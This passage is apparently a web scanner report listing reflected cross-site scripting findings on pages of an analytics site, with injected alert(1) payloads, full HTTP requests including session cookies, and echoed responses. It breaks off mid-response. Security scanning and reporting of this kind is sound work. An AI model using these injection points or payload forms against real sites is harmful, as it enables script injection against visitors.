<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 4--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed17787e4872%2F4774%2FRegulatory-Compliance%2Fstrategy-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/1447164--><script>alert(1)</script>d17787e4872/4774/Regulatory-Compliance/strategy-compliance.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload a1c0a--><script>alert(1)</script>0b4fea96c73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/14/4774a1c0a--><script>alert(1)</script>0b4fea96c73/Regulatory-Compliance/strategy-compliance.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:06 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:07 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... c0a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0b4fea96c73%2FRegulatory-Compliance%2Fstrategy-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/14/4774a1c0a--><script>alert(1)</script>0b4fea96c73/Regulatory-Compliance/strategy-compliance.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 55c09--><script>alert(1)</script>bf3e5338c9e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/14/4774/Regulatory-Compliance55c09--><script>alert(1)</script>bf3e5338c9e/strategy-compliance.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:13 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:13 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 55c09--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebf3e5338c9e%2Fstrategy-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance55c09--><script>alert(1)</script>bf3e5338c9e/strategy-compliance.html"> ...[SNIP]...
The value of REST URL parameter 5 is copied into an HTML comment. The payload cf1ae--><script>alert(1)</script>980e8f9ba54 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/14/4774/Regulatory-Compliance/strategy-compliance.htmlcf1ae--><script>alert(1)</script>980e8f9ba54 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:21 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:21 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... mlcf1ae--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E980e8f9ba54&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.htmlcf1ae--><script>alert(1)</script>980e8f9ba54"> ...[SNIP]...
3.14. http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4c7d2--><script>alert(1)</script>6d9f708ac4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/14/4774/Regulatory-Compliance/strategy-compliance.html?4c7d2--><script>alert(1)</script>6d9f708ac4a=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... d2--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6d9f708ac4a%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.html?4c7d2--><script>alert(1)</script>6d9f708ac4a=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 52fde--><script>alert(1)</script>8290483de10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract52fde--><script>alert(1)</script>8290483de10/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:40:30 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:31 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3Ealert%281%29%3C%2Fscript%3E8290483de10%2F7%2F4814%2FEnterprise-Software%2Fit-pro-impact-report-sharepoint-2010.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract52fde--><script>alert(1)</script>8290483de10/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 42973--><script>alert(1)</script>454e510e36f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/742973--><script>alert(1)</script>454e510e36f/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:40:56 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:56 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... t%3Ealert%281%29%3C%2Fscript%3E454e510e36f%2F4814%2FEnterprise-Software%2Fit-pro-impact-report-sharepoint-2010.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/742973--><script>alert(1)</script>454e510e36f/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 4e97f--><script>alert(1)</script>fee00e08e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/7/48144e97f--><script>alert(1)</script>fee00e08e9/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:02 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:02 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45993
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ript%3Ealert%281%29%3C%2Fscript%3Efee00e08e9%2FEnterprise-Software%2Fit-pro-impact-report-sharepoint-2010.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/7/48144e97f--><script>alert(1)</script>fee00e08e9/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload e65d9--><script>alert(1)</script>d674e82b6c1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/7/4814/Enterprise-Softwaree65d9--><script>alert(1)</script>d674e82b6c1/it-pro-impact-report-sharepoint-2010.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:09 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:09 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... cript%3Ealert%281%29%3C%2Fscript%3Ed674e82b6c1%2Fit-pro-impact-report-sharepoint-2010.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/7/4814/Enterprise-Softwaree65d9--><script>alert(1)</script>d674e82b6c1/it-pro-impact-report-sharepoint-2010.html"> ...[SNIP]...
The value of REST URL parameter 5 is copied into an HTML comment. The payload 21610--><script>alert(1)</script>20b72df1c4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html21610--><script>alert(1)</script>20b72df1c4 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:14 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:14 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45993
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3Cscript%3Ealert%281%29%3C%2Fscript%3E20b72df1c4&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html21610--><script>alert(1)</script>20b72df1c4"> ...[SNIP]...
3.20. http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 39828--><script>alert(1)</script>2323f7bbb5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html?39828--><script>alert(1)</script>2323f7bbb5b=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
pt%3Ealert%281%29%3C%2Fscript%3E2323f7bbb5b%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html?39828--><script>alert(1)</script>2323f7bbb5b=1">
...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 924e1--><script>alert(1)</script>07bb1c645bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract924e1--><script>alert(1)</script>07bb1c645bd/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:40:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:26 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
bb1c645bd%2F81%2F4794%2FBusiness-Intelligence-and-Information-Management%2Fthree-guidelines-for-implementing-mdm.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract924e1--><script>alert(1)</script>07bb1c645bd/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html">
...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 354b7--><script>alert(1)</script>403b10a048c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/81354b7--><script>alert(1)</script>403b10a048c/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:40:56 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:56 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
403b10a048c%2F4794%2FBusiness-Intelligence-and-Information-Management%2Fthree-guidelines-for-implementing-mdm.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/81354b7--><script>alert(1)</script>403b10a048c/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html">
...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload e8b04--><script>alert(1)</script>6a5a5123e13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/81/4794e8b04--><script>alert(1)</script>6a5a5123e13/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:03 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:03 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
3E6a5a5123e13%2FBusiness-Intelligence-and-Information-Management%2Fthree-guidelines-for-implementing-mdm.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/81/4794e8b04--><script>alert(1)</script>6a5a5123e13/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html">
...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 7446c--><script>alert(1)</script>3b3d6a8badb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/81/4794/Business-Intelligence-and-Information-Management7446c--><script>alert(1)</script>3b3d6a8badb/three-guidelines-for-implementing-mdm.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:10 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
